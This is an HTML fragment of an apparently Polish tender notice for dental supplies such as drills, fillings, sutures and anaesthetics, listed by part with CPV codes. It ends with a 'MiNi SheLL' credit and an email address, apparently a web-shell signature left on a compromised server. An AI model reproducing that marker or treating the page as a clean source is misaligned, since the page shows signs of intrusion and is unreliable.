<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wiertła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.15.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wypełnienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.18.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> narzędzia stomatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> podkład - cement.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.18.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> materiały do protetyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> inne materiały stomatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> nici chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> nici chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> leki znieczulające.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.66.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com